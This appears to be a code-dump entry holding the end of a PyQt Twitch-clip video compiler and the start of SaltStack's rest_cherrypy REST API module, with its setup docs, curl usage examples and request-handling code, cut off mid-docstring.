self.videoWrapper.scriptWrapper.addClipAtStart(firstClip)
self.populateTreeWidget()
self.chooseFirstClip.setText("Reselect First Clip")
except Exception as e:
self.uploadFail("Error occured uploading file \n %s" % (e))
def saveDefaultIntro(self):
with open(f'Save Data/defaultintro.save', 'wb') as pickle_file:
pickle.dump(self.introClip, pickle_file)
def saveDefaultInterval(self):
with open(f'Save Data/defaultinterval.save', 'wb') as pickle_file:
pickle.dump(self.intervalClipPath, pickle_file)
def saveDefaultOutro(self):
with open(f'Save Data/defaultoutro.save', 'wb') as pickle_file:
pickle.dump(self.outroClipPath, pickle_file)
def loadDefaultIntro(self):
if os.path.exists("Save Data/defaultintro.save"):
with open(f'Save Data/defaultintro.save', 'rb') as pickle_file:
self.introClip = pickle.load(pickle_file)
self.introClipPath = self.introClip.mp4
self.defaultIntro.setChecked(True)
self.chooseIntro.setText("Reselect Intro")
def loadDefaultInterval(self):
if os.path.exists("Save Data/defaultinterval.save"):
with open(f'Save Data/defaultinterval.save', 'rb') as pickle_file:
self.intervalClip = pickle.load(pickle_file)
self.intervalClipPath = self.intervalClip
self.defaultInterval.setChecked(True)
self.chooseInterval.setText("Reselect Interval")
def loadDefaultOutro(self):
if os.path.exists("Save Data/defaultoutro.save"):
with open(f'Save Data/defaultoutro.save', 'rb') as pickle_file:
self.outroClip = pickle.load(pickle_file)
self.outroClipPath = self.outroClip
self.defaultOutro.setChecked(True)
self.chooseOutro.setText("Reselect Outro")
#Collecting all of the information for video generator
def exportVideo(self):
intervalCheck = True if (self.intervalClipPath is not None and settings.enforceInterval) or not settings.enforceInterval else False
firstClipCheck = True if (self.firstClipPath is not None and settings.enforceFirstClip) or not settings.enforceFirstClip else False
introClipCheck = True if (self.introClipPath is not None and settings.enforceIntro) or not settings.enforceIntro else False
outroClipCheck = True if (self.outroClipPath is not None and settings.enforceOutro) or not settings.enforceOutro else False
if intervalCheck is True and firstClipCheck is True and introClipCheck is True and outroClipCheck is True:
self.mediaPlayer.stop()
final_clips = self.videoWrapper.scriptWrapper.getFinalClips()
with_intro = []
if settings.enforceIntro:
self.introClip = scriptwrapper.DownloadedTwitchClipWrapper("", "", " ", "", None, 0, 0, 0, 0)
self.introClip.author_name = None
self.introClip.mp4 = self.introClipPath
self.introClip.isIntro = True
self.introClip.isInterval = False
self.introClip.upload = True
self.introClip.isUsed = True
media_info_intro = MediaInfo.parse(self.introClipPath)
duration_intro = media_info_intro.tracks[0].duration / 1000
self.introClip.vid_duration = float(duration_intro)
if settings.enforceInterval:
self.intervalClip = scriptwrapper.DownloadedTwitchClipWrapper("", "", " ", "", None, 0, 0, 0, 0)
self.intervalClip.author_name = None
self.intervalClip.mp4 = self.intervalClipPath
self.intervalClip.isInterval = True
self.intervalClip.isIntro = False
self.intervalClip.upload = True
self.intervalClip.isUsed = True
media_info_interval = MediaInfo.parse(self.intervalClipPath)
duration_interval = media_info_interval.tracks[0].duration / 1000
self.intervalClip.vid_duration = float(duration_interval)
if settings.enforceOutro:
self.outroClip = scriptwrapper.DownloadedTwitchClipWrapper("", "", " ", "", None, 0, 0, 0, 0)
self.outroClip.author_name = None
self.outroClip.mp4 = self.outroClipPath
self.outroClip.isOutro = True
self.outroClip.upload = True
self.outroClip.isUsed = True
media_info_outro = MediaInfo.parse(self.outroClipPath)
duration_outro = media_info_outro.tracks[0].duration / 1000
self.outroClip.vid_duration = float(duration_outro)
if self.defaultIntro.isChecked():
self.saveDefaultIntro()
if self.defaultInterval.isChecked():
self.saveDefaultInterval()
if self.defaultOutro.isChecked():
self.saveDefaultOutro()
for i, clip in enumerate(final_clips):
with_intro.append(clip)
if i == 0:
if settings.enforceInterval:
with_intro.append(self.intervalClip)
if settings.enforceIntro:
with_intro.append(self.introClip)
if settings.enforceOutro:
with_intro.append(self.outroClip)
self.videoWrapper.final_clips = with_intro
self.clipupload = ClipUploadMenu(self.videoWrapper, self.videoName.text())
self.clipupload.show()
else:
print("Choose intro clip and first clip")
#Converting the video duration/position to seconds so it makes sense
def getPositionInSecs(self):
try:
index = self.playlist.currentIndex()
vid_position = self.mediaPlayer.position()
vid_duration = self.mediaPlayer.duration()
vid_percentage = (vid_position / vid_duration)
twitchclip = self.videoWrapper.scriptWrapper.getCommentInformation(self.mainCommentIndex)
return int(twitchclip.vid_duration * vid_percentage)
except:
pass
def videoExportConfirmation(self):
msg = 'Is the video long enough?\nIs everything properly cut?'
buttonReply = QMessageBox.information(self, 'Video Export Confirmation', msg, QMessageBox.Yes | QMessageBox.Cancel, QMessageBox.Cancel)
if buttonReply == QMessageBox.Yes:
intervalCheck = True if (self.intervalClipPath is not None and settings.enforceInterval) or not settings.enforceInterval else False
firstClipCheck = True if (self.firstClipPath is not None and settings.enforceFirstClip) or not settings.enforceFirstClip else False
introClipCheck = True if (self.introClipPath is not None and settings.enforceIntro) or not settings.enforceIntro else False
outroClipCheck = True if (self.outroClipPath is not None and settings.enforceOutro) or not settings.enforceOutro else False
msg = "Could not publish due to the following reasons: \n"
if not intervalCheck:
msg += "No interval selected, but interval expected (see config.ini)\n"
if not firstClipCheck:
msg += "No first clip selected, but first clip expected (see config.ini)\n"
if not introClipCheck:
msg += "No intro clip selected, but intro expected (see config.ini)\n"
if not outroClipCheck:
msg += "No outro clip selected, but outro expected (see config.ini)\n"
amountClips = len(self.videoWrapper.scriptWrapper.getKeptClips())
if amountClips < 2:
msg += "Not enough clips! Need at least two clips to be kept."
if intervalCheck is False or firstClipCheck is False or introClipCheck is False or outroClipCheck is False or amountClips < 2:
self.publishFail(msg)
return
self.mediaPlayer.stop()
self.close()
self.exportVideo()
print('Yes clicked.')
if buttonReply == QMessageBox.Cancel:
print('Cancel')
def uploadFail(self, msg):
buttonReply = QMessageBox.information(self, 'Upload fail', msg, QMessageBox.Ok)
def publishFail(self, msg):
buttonReply = QMessageBox.information(self, 'Publish fail', msg, QMessageBox.Ok)
|
app.py | # encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://github.com/cherrypy/cherrypy/issues/1298>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionaddedd:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionaddedd:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`client interfaces <netapi-clients>`
documentation, but in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<netapi-clients>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import os
import signal
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
..versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except (cherrypy.TimeoutError, salt.exceptions.SaltClientTimeout):
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
return out(ret)
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
@functools.wraps
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.cors_tool = cherrypy.Tool('before_request_body',
cors_tool, priority=50)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if cherrypy.session.get('user'):
chunk['__current_eauth_user'] = cherrypy.session.get('user')
if cherrypy.session.get('groups'):
chunk['__current_eauth_groups'] = cherrypy.session.get('groups')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
